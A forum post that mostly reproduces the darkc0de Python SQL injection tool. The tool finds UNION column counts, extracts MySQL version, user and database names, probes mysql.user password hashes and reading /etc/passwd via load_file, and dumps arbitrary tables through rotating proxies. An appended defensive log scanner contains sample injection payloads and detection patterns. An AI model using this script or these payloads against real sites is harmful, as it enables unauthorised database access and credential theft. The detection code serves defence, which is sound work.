            sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva
            makepretty = ""
            for x in xrange(0,colMax):
                    try:
                            sys.stdout.write("%s," % (x))
                            file.write(str(x)+",")
                            sys.stdout.flush()
                            darkc0de = "dark"+str(x)+"c0de"
                            checkfor.append(darkc0de)  
                            if x > 0: 
                                    sitenew += ","
                            sitenew += "0x"+darkc0de.encode("hex")	
                            finalurl = sitenew+arg_end
                            gets+=1
                            proxy_num+=1
                            source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
                            for y in checkfor:
                                    colFound = re.findall(y,source)
                                    if len(colFound) >= 1:
                                            print "\n[+] Column Length is:",len(checkfor)
                                            file.write("\n[+] Column Length is: "+str(len(checkfor)))
                                            nullcol = re.findall(("\d+"),y)
                                            print "[+] Found null column at column #:",nullcol[0]
                                            file.write("\n[+] Found null column at column #: "+nullcol[0])
                                            for z in xrange(0,len(checkfor)):
                                                    if z > 0:
                                                            makepretty += ","
                                                    makepretty += str(z)
                                            site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty
                                            print "[+] SQLi URL:",site+arg_end
                                            file.write("\n[+] SQLi URL: "+site+arg_end)
                                            site = site.replace(","+nullcol[0]+",",",darkc0de,")
                                            site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
                                            site = site.replace(","+nullcol[0],",darkc0de")
                                            print "[+] darkc0de URL:",site
                                            file.write("\n[+] darkc0de URL: "+site)
                                            print "[-] Done!\n"
                                            file.write("\n[-] Done!\n")
                                            sys.exit(1)
                    except (KeyboardInterrupt, SystemExit):
                            raise
                    except:
                            pass
                            
            print "\n[!] Sorry Column Length could not be found."
            file.write("\n[!] Sorry Column Length could not be found.")
            print "[-] You might try to change colMax variable or change evasion option.. last but not least do it manually!"
            print "[-] Done\n"
            sys.exit(1)
    
    #Retireve version:user:database
    head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
    print "[+] Gathering MySQL Server Configuration..."
    file.write("\n[+] Gathering MySQL Server Configuration...\n")
    
    while 1:
    	try:
                    gets+=1
    		source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
    # Uncomment the following lines to debug issues with gathering server information
    #		print head_URL
    #		print source
    		match = re.findall("\x1e\x1e\S+",source)
    		if len(match) >= 1:
    			match = match[0][2:].split("\x1e")
    			version = match[0]
    			user = match[1]
    			database = match[2]
    			print "\tDatabase:", database
    			print "\tUser:", user
    			print "\tVersion:", version
    			file.write("\tDatabase: "+database+"\n")	
    			file.write("\tUser: "+user+"\n")
    			file.write("\tVersion: "+version)
                            version = version[0]
                            break
    		else:
    			print "[-] No Data Found"
    			sys.exit(1)
    	except (KeyboardInterrupt, SystemExit):
            	raise
    	except:
    		proxy_num+=1
    
    # Do we have Access to MySQL database and Load_File
    if mode == "--info":
            head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
            gets+=1
            proxy_num+=1
            #print "Debug:",head_URL 
            source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
            match = re.findall("darkc0de",source)
            if len(match) >= 1:
                    yesno = "Yes <-- w00t w00t"
            else:
                    yesno = "No"
            print "\n[+] Do we have Access to MySQL Database:",yesno
            file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
            if yesno == "Yes <-- w00t w00t":
                    print "[!]",site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
                    file.write("\n[!] "+site.replace("darkc0de","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end)
            gets+=1
            proxy_num+=1
            head_URL = site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
            #print "Debug:",head_URL
            source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
            match = re.findall("root:x:",source)
            match = re.findall("root:*:",source)
            if len(match) >= 1:
                    yesno = "Yes <-- w00t w00t"
            else:
                    yesno = "No"
            print "\n[+] Do we have Access to Load_File:",yesno
            file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
            if yesno == "Yes <-- w00t w00t":
                    print "[!]",site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end
                    file.write("\n[!] "+site.replace("darkc0de","load_file(0x2f6574632f706173737764)")+arg_end)
    
    #lets check what we can do based on version
    if mode == "--schema" or mode == "--dbs" or mode == "--full":
            if int(version) == 4:
                    print "\n[-] --schema, --dbs and --full can only be used on MySQL v5+ servers!"
                    print "[-] -h for help"
                    sys.exit(1)
    #Build URLS
    if mode == "--schema":
    	if arg_database != "None" and arg_table == "None":
                    print "[+] Showing Tables & Columns from database \""+arg_database+"\""
                    file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
            	line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
                    line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
                    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
                    count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")+arg_end
                    arg_row = "Tables"
            if arg_database != "None" and arg_table != "None":
                    print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
                    file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
            	line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
                    line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
    		line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")
                    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
                    count_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
    		count_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")+arg_end
    		arg_row = "Columns"
    elif mode == "--dump":                
    	print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
    	print "[+] and Column(s) "+str(arg_columns)
    	file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
            file.write("\n[+] Column(s) "+str(arg_columns))
            for column in arg_columns:
                    darkc0de += column+",0x1e,"
    	count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
    	count_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table+arg_end
    	line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
    	line_URL += arg_eva+"FROM"+arg_eva+arg_database+"."+arg_table
            if int(version) == 4:
                    count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
                    count_URL += arg_eva+"FROM"+arg_eva+arg_table+arg_end
            	line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")
                    line_URL += arg_eva+"FROM"+arg_eva+arg_table
    elif mode == "--full":
    	print "[+] Starting full SQLi information_schema enumeration..."
    	line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
    	line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns+"+arg_eva+"WHERE"+arg_eva+"table_schema!=0x"+"information_schema".encode("hex")
    		
    elif mode == "--dbs":
    	print "[+] Showing all databases current user has access to!"
    	file.write("\n[+] Showing all databases current user has access to!")
            count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
            count_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")+arg_end
    	line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
    	line_URL += arg_eva+"FROM"+arg_eva+"information_schema.schemata"+arg_eva+"WHERE"+arg_eva+"schema_name!=0x"+"information_schema".encode("hex")
    	arg_row = "Databases"
    line_URL += arg_eva+"LIMIT"+arg_eva+"NUM,1"+arg_end
    
    #Uncomment the lines below to debug issues with the line_URL or count_URL
    #print "URL for Counting rows in column:",count_URL
    #print "URL for exploit:",line_URL
    
    #Fuzz table/columns
    if mode == "--fuzz":
            print "[+] Number of tables names to be fuzzed:",len(fuzz_tables)
            file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
            print "[+] Number of column names to be fuzzed:",len(fuzz_columns)
            file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
            print "[+] Searching for tables and columns..."
            file.write("\n[+] Searching for tables and columns...")
            fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+arg_eva+"FROM"+arg_eva+"TABLE"+arg_end
            for table in fuzz_tables: 
                    try:
                            proxy_num+=1
                            table_URL = fuzz_URL.replace("TABLE",table)
                            gets+=1
                            #print "[!] Table Debug:",table_URL
                            source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
                            e = re.findall("darkc0de", source)
                            if len(e) > 0:
                                    print "\n[!] Found a table called:",table
                                    file.write("\n\n[+] Found a table called: "+str(table))
                                    print "\n[+] Now searching for columns inside table \""+table+"\""
                                    file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
                                    for column in fuzz_columns:
                                            try:
                                                    proxy_num+=1
                                                    gets+=1
                                                    #print "[!] Column Debug:",table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")
                                                    source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("0x6461726b63306465", "concat(0x6461726b63306465,0x3a,"+column+")")).read()
                                                    e = re.findall("darkc0de",source)
                                                    if len(e) > 0:
                                                            print "[!] Found a column called:",column
                                                            file.write("\n[!] Found a column called:"+column)	
                                            except (KeyboardInterrupt, SystemExit):
                                                    raise
                                            except:
                                                    pass
                                    print "[-] Done searching inside table \""+table+"\" for columns!"
                                    file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
                    except (KeyboardInterrupt, SystemExit):
                            raise
                    except:
                            pass
            
    #Lets Count how many rows or columns
    if mode == "--schema" or mode == "--dump" or mode == "--dbs":
            source = proxy_list[proxy_num % proxy_len].open(count_URL).read() 
            match = re.findall("\x1e\x1e\S+",source)
            match = match[0][2:].split("\x1e")
            row_value = match[0]
            print "[+] Number of "+arg_row+": "+row_value
            file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
    if mode == "--schema" or mode == "--full" or mode == "--dbs":
            print
    ##Schema Enumeration and DataExt loop
    if mode == "--schema" or mode == "--dump" or mode == "--dbs":
    	while int(table_num) != int(row_value)+1:
                    #print "table#:",table_num,"row#:",row_value
    		try:
    			proxy_num+=1
    			gets+=1
    			#print line_URL
    			source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read() 
    			match = re.findall("\x1e\x1e\S+",source)
    			if len(match) >= 1:
    				if mode == "--schema" or mode == "--full":
    					match = match[0][2:].split("\x1e")
    					if cur_db != match[0]:			
    						cur_db = match[0]
    						file.write("\n[Database]: "+match[0]+"\n")
    						print "[Database]: "+match[0]
    						print "[Table: Columns]"
    						file.write("[Table: Columns]")
    					if cur_table != match[1]:
                                                    print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
                                                    file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
    						cur_table = match[1]
                                    		table_num = int(table_num) + 1
    					else:
                                                    sys.stdout.write(",%s" % (match[2]))
                                                    file.write(","+match[2])
                                                    sys.stdout.flush()
    				#Gathering Databases only
                       		elif mode == "--dbs":
                            		match = match[0]
                            		file.write("\n["+str(num)+"]"+str(match))
                           			print "["+str(num)+"]",match
    					table_num = int(table_num) + 1
    				#Collect data from tables & columns
    				elif mode == "--dump":
                                            match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-+]+\x1e\x1e",source)
    					match = match[0].strip("\x1e").split("\x1e")
    					if arg_verbose == 1:
                                                    print "\n["+str(num)+"] ",
                                                    file.write("\n["+str(num)+"] ",)
                                            else:
                                                    print 
                                                    file.write("\n")
    					for ddata in match:
                                                    if ddata == "":
                                                            ddata = "NoDataInColumn"
                                                    sys.stdout.write("%s:" % (ddata))
                                                    file.write("%s:" % ddata)
                                                    sys.stdout.flush()
                                            table_num = int(table_num) + 1
    			else:
    				if mode == "--dump":
                                            sys.stdout.write("\n[%s] No data" % (num))
                                            file.write("%s:" % ddata)
                                            table_num = int(table_num) + 1
                                    else:
                                            break
    			num = int(num) + 1
    		except (KeyboardInterrupt, SystemExit):
    			raise
    		except:
    			pass
    
    #Full SQLi information_schema Enumeration
    if mode == "--full":
            while 1:
                    try:                        
                            proxy_num+=1
                            gets+=1
                            source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read() 
                            match = re.findall("\x1e\x1e\S+",source)
                            if len(match) >= 1:
                                    match = match[0][2:].split("\x1e")
                                    if cur_db != match[0]:			
                                            cur_db = match[0]
                                            file.write("\n\n[Database]: "+match[0]+"\n")
                                            print "\n\n[Database]: "+match[0]
                                            print "[Table: Columns]"
                                            file.write("[Table: Columns]")
                                            table_num=0
                                    if cur_table != match[1]:
                                            print "\n["+str(table_num)+"]"+match[1]+": "+match[2],
                                            file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2])
                                            cur_table = match[1]
                                            table_num = int(table_num) + 1
                                    else:
                                            sys.stdout.write(",%s" % (match[2]))
                                            file.write(","+match[2])
                                            sys.stdout.flush()
                            else:
                                    if num == 0:
                                            print "\n[-] No Data Found"
                                    break
                            num = int(num) + 1
                    except (KeyboardInterrupt, SystemExit):
                            raise
                    except:
                            pass
    
    #Lets wrap it up!
    if mode == "--schema" or mode == "--full" or mode == "--dump":
            print ""
    print "\n[-] %s" % time.strftime("%X")
    print "[-] Total URL Requests",gets
    file.write("\n\n[-] [%s]" % time.strftime("%X"))
    file.write("\n[-] Total URL Requests "+str(gets))
    print "[-] Done\n"
    file.write("\n[-] Done\n")
    print "Don't forget to check", dbt,"\n"
    file.close()


    The fuzz dictionary of table and column names used by the fuzz technique can be edited yourself if you want to add more; the default is just that.
    This is Python code; please install the interpreter first.
    Last edited by bl00d13z; 14-05-09 at 16:02.
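Added example (not from bl00d13z's post and not part of the darkc0de script above), written from the web server's side: a small access-log scanner that flags the request shapes the posted script produces. The indicators are taken from what the script itself puts in the URL: `UNION ALL SELECT`, `information_schema.` lookups, `load_file(0x...)`, `mysql.user`, the `concat(0x1e,0x1e,...)` row delimiter, and hex literals such as `0x6461726b63306465` ("darkc0de") and `0x2f6574632f706173737764` ("/etc/passwd") that hide strings from naive filters. The log lines, IP addresses, path and database name are constructed for the demo; the function and indicator names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (Apache common log format); hosts, paths and
# the "webfe" schema name are made up for this example.
SAMPLE_LOG = """\
192.0.2.10 - - [14/May/2009:16:02:01 +0700] "GET /news.php?id=12 HTTP/1.1" 200 5120
192.0.2.10 - - [14/May/2009:16:02:03 +0700] "GET /news.php?id=12' HTTP/1.1" 500 312
192.0.2.10 - - [14/May/2009:16:02:05 +0700] "GET /news.php?id=-12+UNION+ALL+SELECT+1,concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20),3+FROM+information_schema.columns+WHERE+table_schema=0x7765626665-- HTTP/1.1" 200 4098
192.0.2.10 - - [14/May/2009:16:02:07 +0700] "GET /news.php?id=-12+UNION+ALL+SELECT+1,load_file(0x2f6574632f706173737764),3-- HTTP/1.1" 200 2210
192.0.2.10 - - [14/May/2009:16:02:09 +0700] "GET /news.php?id=-12+UNION+ALL+SELECT+1,concat(0x6461726b63306465,0x3a,username),3+FROM+users-- HTTP/1.1" 200 4001
198.51.100.7 - - [14/May/2009:16:03:00 +0700] "GET /news.php?id=13 HTTP/1.1" 200 5077
"""

# Common log format: client, ident, user, [timestamp], "METHOD path HTTP/x", status, bytes
LOG_RX = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) \d+'
)

# MySQL hex string literal, e.g. 0x2f6574632f706173737764
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

# Plain-text indicators, matched on the URL-decoded query string.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("load_file", re.compile(r"\bload_file\s*\(", re.I)),
    ("mysql_user_table", re.compile(r"\bmysql\.user\b", re.I)),
    ("delimiter_marker_0x1e", re.compile(r"concat\s*\(\s*0x1e\s*,\s*0x1e", re.I)),
]

# Strings the script hides inside hex literals, mapped to an indicator label.
MARKER_STRINGS = {
    "darkc0de": "tool_marker",
    "/etc/passwd": "local_file_read",
    "information_schema": "schema_read",
}


def decode_hex_literals(text):
    """Return the printable ASCII strings encoded as 0x... literals in text."""
    decoded = []
    for hexdigits in HEX_LITERAL.findall(text):
        if len(hexdigits) % 2:
            continue  # odd length cannot be a byte string
        try:
            value = bytes.fromhex(hexdigits).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if value.isprintable():
            decoded.append(value)
    return decoded


def analyse_request(path):
    """Return the list of indicator labels found in one request path."""
    query = unquote_plus(path)  # the script uses '+' for spaces and %xx escapes
    hits = [name for name, rx in INDICATORS if rx.search(query)]
    for value in decode_hex_literals(query):
        for marker, label in MARKER_STRINGS.items():
            if marker in value and label not in hits:
                hits.append(label)
    return hits


def scan_log(log_text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RX.match(line)
        if not m:
            continue
        client, _timestamp, path, status = m.groups()
        hits = analyse_request(path)
        # A lone quote in a numeric parameter followed by a 5xx is the
        # "does the server error out?" probe that precedes the injection.
        if "'" in unquote_plus(path) and status.startswith("5"):
            hits.append("quote_error_probe")
        if hits:
            findings.append(
                {"line": lineno, "client": client, "status": int(status), "indicators": hits}
            )
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("line %(line)d %(client)s HTTP %(status)d: %(indicators)s" % finding)
```

Decoding the hex literals is the part that matters in practice: a filter that only looks for `/etc/passwd` or `information_schema` as text never sees them in this script's traffic, while the same strings are trivially recovered from the `0x...` form. On a real server, run `scan_log` over the access log and correlate the `quote_error_probe` hit with the later `union_select` hits from the same client; the 5xx that the probe triggers is also the reason to return a generic error page rather than the database message.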
